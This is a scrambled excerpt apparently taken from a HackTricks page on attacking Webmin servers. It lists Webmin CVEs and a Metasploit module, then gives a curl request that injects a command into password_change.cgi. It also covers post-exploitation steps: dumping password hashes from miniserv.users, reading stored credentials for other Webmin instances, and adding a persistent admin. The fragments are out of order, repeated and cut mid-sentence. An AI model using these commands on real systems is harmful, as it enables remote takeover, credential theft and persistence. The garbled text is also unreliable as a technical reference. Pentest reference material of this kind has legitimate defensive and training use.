Hacktricks — Webmin

Works even without password expiry enabled – just need a valid session cookie. 4.2 CVE-2019-12840 (Webmin < 1.910) Vulnerability: update.cgi RCE via u' parameter injection. Requires authenticated user. 4.3 CVE-2020-35606 (1.962) Vulnerability: Arbitrary file disclosure in package-updates/update.cgi (CWE-22) – leads to root SSH key theft. 5. Post-Exploitation Once you have root (Webmin runs as root by default): 5.1 Dump Webmin Users cat /etc/webmin/miniserv.users # Format: user:encrypted_pass 5.2 Modify Webmin to Persist Add a new admin user:

# Using metasploit use exploit/linux/http/webmin_package_updates_rce # Or manual: curl -k -X POST 'https://<target>:10000/password_change.cgi' \ -H 'Referer: https://<target>:10000/session_login.cgi' \ -H 'Content-Type: application/x-www-form-urlencoded' \ --data 'user=root&pam=&expired=2&old=id&new1=test&new2=test' Command output shown in error message. webmin hacktricks

cat /etc/webmin/servers/*.conf # Contains IPs and credentials to other Webmin instances. Detect Webmin service: Works even without password expiry enabled – just

ss -tlnp | grep 10000 ps aux | grep miniserv cat /etc/webmin/servers/*

(if password expiry module enabled):